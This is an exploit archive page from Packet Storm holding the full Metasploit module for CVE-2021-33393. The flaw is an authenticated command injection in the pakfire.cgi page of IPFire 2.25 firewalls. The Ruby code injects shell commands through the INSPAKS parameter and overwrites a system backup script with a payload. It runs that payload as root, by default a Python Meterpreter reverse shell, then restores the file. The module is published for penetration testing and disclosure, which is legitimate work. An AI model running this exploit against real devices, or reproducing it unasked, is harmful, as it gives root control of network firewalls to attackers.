exploit the possibilities

IPFire 2.25 Remote Code Execution

IPFire 2.25 Remote Code Execution
Posted Jun 15, 2021
Authored by Grant Willcox, Mucahit Saratar | Site metasploit.com

This Metasploit module exploits an authenticated command injection vulnerability in the /cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156 and prior to execute arbitrary code as the root user.

tags | exploit, web, arbitrary, cgi, root
advisories | CVE-2021-33393
MD5 | 69d36ee1b60ffec6d31a6ebc94e2dc1e

IPFire 2.25 Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE',
'Description' => %q{
This module exploits an authenticated command injection vulnerability in the
/cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156
and prior to execute arbitrary code as the root user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mücahit Saratar <trregen222@gmail.com>', # vulnerability research & exploit development
'Grant Willcox' # Module enhancements and documentation fixes.
],
'References' =>
[
[ 'EDB', '49869' ],
[ 'CVE', '2021-33393'],
[ 'URL', 'https://github.com/MucahitSaratar/ipfire-2-25-auth-rce'],
[ 'URL', 'https://www.youtube.com/watch?v=5FUXV7dfNjg'],
],
'Platform' => ['python' ],
'Privileged' => true,
'Arch' => [ ARCH_PYTHON ],
'Targets' =>
[
[
'Python Dropper',
{
'Platform' => 'python',
'Arch' => [ ARCH_PYTHON ],
'Type' => :unix_memory,
'DefaultOptions' => {
'PAYLOAD' => 'python/meterpreter/reverse_tcp'
}
}
]
],
'DisclosureDate' => '2021-05-17',
'Notes' => {
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ CONFIG_CHANGES, IOC_IN_LOGS ]
},
'DefaultTarget' => 0
)
)
register_options(
[
Opt::RPORT(444),
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ true, 'Password to login with', '']),
]
)
end

def vpath
'/cgi-bin/pakfire.cgi' # vulnerable path
end

def send_packet(method, execstr, waitsec)
myheaders = {
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/"
}
if method == 'GET'
response = send_request_cgi(
'uri' => vpath,
'headers' => myheaders,
'SSL' => true,
'timeout' => waitsec
)
else
response = send_request_cgi(
'uri' => vpath,
'headers' => myheaders,
'SSL' => true,
'method' => 'POST',
'vars_post' => {
'INSPAKS' => ";#{execstr}",
'ACTION' => 'install',
'x' => Rex::Text.rand_text_numeric(2),
'y' => Rex::Text.rand_text_numeric(2)
},
'timeout' => waitsec
)
end
response
end

def check
cevap = send_packet('GET', '', 10)
if cevap.nil? || cevap.body.empty?
return CheckCode::Unknown('No response from the target!')
end

unless cevap.body.scan(/401 Unauthorized/).empty?
return CheckCode::Unknown('Invalid credentials supplied! Check USERNAME and PASSWORD options!')
end

version = cevap.body.scan(/IPFire (.*) \(.*\) - Core Update [0-9]{3}/).flatten[0] || ''
core = cevap.body.scan(/IPFire .* \(.*\) - Core Update (.*)/).flatten[0] || ''
unless version
return CheckCode::Safe('Target is not IPFire')
end
if core.to_i >= 157
return CheckCode::Safe("Target is running IPFire #{version} (Core Update #{core})")
end

CheckCode::Appears("Target is running IPFire #{version} (Core Update #{core})")
end

def exploit
temp_backup_file = Rex::Text.rand_text_alphanumeric(5, 30)
print_status("Backing up backup.pl to /tmp/#{temp_backup_file}...")
if send_packet('POST', "cp /var/ipfire/backup/bin/backup.pl /tmp/#{temp_backup_file}", 1).nil?
fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to back up backup.pl!")
end

print_status('Overwriting the contents of backup.pl with a Python header statement')
if send_packet('POST', 'echo "#!/usr/bin/python" > /var/ipfire/backup/bin/backup.pl', 1).nil?
fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to overwrite backup.pl!")
end

print_status('Appending the contents of backup.pl with the Python code to be executed.')
if send_packet('POST', "echo \"#{payload.encoded}\" >> /var/ipfire/backup/bin/backup.pl", 1).nil?
fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to append to backup.pl!")
end

print_status('Executing /usr/local/bin/backupctrl to run the payload')
unless send_packet('POST', '/usr/local/bin/backupctrl', 1).nil?
fail_with(Failure::UnexpectedReply, 'Something went wrong, the server should not respond after we execute the payload.')
end

print_good('You should now have your shell, restoring the original contents of the backup.pl file...')
if send_packet('POST', "cp /tmp/#{temp_backup_file} /var/ipfire/backup/bin/backup.pl", 20).nil?
fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to restore backup.pl!")
end

print_status('All done, enjoy the shells!')
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
Login or Register to add favorites

File Archive:

August 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    1 Files
  • 2
    Aug 2nd
    7 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close